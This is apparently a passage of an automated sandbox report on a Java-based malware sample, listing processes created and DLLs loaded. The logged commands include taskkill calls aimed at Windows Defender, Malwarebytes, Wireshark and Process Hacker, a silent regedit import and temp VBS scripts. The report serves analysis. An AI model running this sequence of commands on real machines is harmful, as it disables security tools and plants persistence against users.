Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM UserAccountControlSettings.exe /T /F Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c regedit.exe /s C:\Users\user\AppData\Local\Temp\mqjqrgZaqQ856862126040995288.reg Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM ProcessHacker.exe /T /F Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\cscript.exe cscript.exe C:\Users\user\AppData\Local\Temp\Retrive2729271214941122137.vbs Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM MSASCui.exe /T /F Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM MsMpEng.exe /T /F Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM MpUXSrv.exe /T /F Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\wbem\WMIC.exe WMIC /Node:localhost /Namespace:\\root\cimv2 Path Win32_PnpSignedDriver Get /Format:List Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM MpCmdRun.exe /T /F Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM NisSrv.exe /T /F Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM ConfigSecurityPolicy.exe /T /F Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM procexp.exe /T /F Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM wireshark.exe /T /F Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM tshark.exe /T /F Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM text2pcap.exe /T /F Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM rawshark.exe /T /F Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM mergecap.exe /T /F Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM editcap.exe /T /F Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM dumpcap.exe /T /F Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM capinfos.exe /T /F Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM mbam.exe /T /F Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM mbamscheduler.exe /T /F Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM mbamservice.exe /T /F Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM AdAwareService.exe /T /F Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\xcopy.exe xcopy "C:\Program Files (x86)\Java\jre-1.8" "C:\Users\user\AppData\Roaming\Oracle\" /e Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C cscript.exe C:\Users\user\AppData\Local\Temp\Retrive536118811270301171.vbs Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c regedit.exe /s C:\Users\user\AppData\Local\Temp\mqjqrgZaqQ856862126040995288.reg Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C cscript.exe C:\Users\user\AppData\Local\Temp\Retrive2729271214941122137.vbs Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C cscript.exe C:\Users\user\AppData\Local\Temp\Retrive6922435490390475939.vbs Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Process created: C:\Windows\SysWOW64\xcopy.exe xcopy "C:\Program Files (x86)\Java\jre-1.8" "C:\Users\user\AppData\Roaming\Oracle\" /e Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cscript.exe cscript.exe C:\Users\user\AppData\Local\Temp\Retrive4451837785175678294.vbs Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cscript.exe cscript.exe C:\Users\user\AppData\Local\Temp\Retrive2729271214941122137.vbs
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cscript.exe cscript.exe C:\Users\user\AppData\Local\Temp\Retrive536118811270301171.vbs
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cscript.exe cscript.exe C:\Users\user\AppData\Local\Temp\Retrive6922435490390475939.vbs
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\regedit.exe regedit.exe /s C:\Users\user\AppData\Local\Temp\mqjqrgZaqQ856862126040995288.reg
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Section loaded: wsock32.dll Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Section loaded: version.dll Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\icacls.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: jscript.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: scrobj.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: msdart.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: msxml3.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: mlang.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: scrrun.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: slc.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: wsock32.dll Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: version.dll Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: dwmapi.dll Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: opengl32.dll Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: glu32.dll Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Section loaded: wsock32.dll Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Section loaded: version.dll Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Section loaded: dwmapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\cscript.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\cscript.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\cscript.exe Section loaded: sxs.dll
Source: C:\Windows\SysWOW64\cscript.exe Section loaded: vbscript.dll
Source: C:\Windows\SysWOW64\cscript.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\cscript.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\cscript.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\cscript.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\cscript.exe Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\cscript.exe Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\cscript.exe Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\cscript.exe Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\cscript.exe Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\cscript.exe Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\cscript.exe Section loaded: scrobj.dll
Source: C:\Windows\SysWOW64\cscript.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\cscript.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\cscript.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\cscript.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\cscript.exe Section loaded: sxs.dll
Source: C:\Windows\SysWOW64\cscript.exe Section loaded: vbscript.dll
Source: C:\Windows\SysWOW64\cscript.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\cscript.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\cscript.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\cscript.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\cscript.exe Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\cscript.exe Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\cscript.exe Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\cscript.exe Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\cscript.exe Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\cscript.exe Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\cscript.exe Section loaded: scrobj.dll
Source: C:\Windows\SysWOW64\cscript.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\cscript.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\cscript.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\cscript.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\cscript.exe Section loaded: sxs.dll
Source: C:\Windows\SysWOW64\cscript.exe Section loaded: vbscript.dll
Source: C:\Windows\SysWOW64\cscript.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\cscript.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\cscript.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\cscript.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\cscript.exe Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\cscript.exe Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\cscript.exe Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\cscript.exe Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\cscript.exe Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\cscript.exe Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\cscript.exe Section loaded: scrobj.dll
Source: C:\Windows\SysWOW64\cscript.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\cscript.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\cscript.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\cscript.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\cscript.exe Section loaded: sxs.dll
Source: C:\Windows\SysWOW64\cscript.exe Section loaded: vbscript.dll
Source: C:\Windows\SysWOW64\cscript.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\cscript.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\cscript.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\cscript.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\cscript.exe Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\cscript.exe Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\cscript.exe Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\cscript.exe Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\cscript.exe Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\cscript.exe Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\cscript.exe Section loaded: scrobj.dll
Source: C:\Windows\SysWOW64\cscript.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\xcopy.exe Section loaded: ulib.dll
Source: C:\Windows\SysWOW64\xcopy.exe Section loaded: ifsutil.dll
Source: C:\Windows\SysWOW64\xcopy.exe Section loaded: devobj.dll
Source: C:\Windows\SysWOW64\xcopy.exe Section loaded: fsutilext.dll
Source: C:\Windows\SysWOW64\xcopy.exe Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\xcopy.exe Section loaded: ulib.dll
Source: C:\Windows\SysWOW64\xcopy.exe Section loaded: ifsutil.dll
Source: C:\Windows\SysWOW64\xcopy.exe Section loaded: devobj.dll
Source: C:\Windows\SysWOW64\xcopy.exe Section loaded: fsutilext.dll
Source: C:\Windows\SysWOW64\xcopy.exe Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: winbrand.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
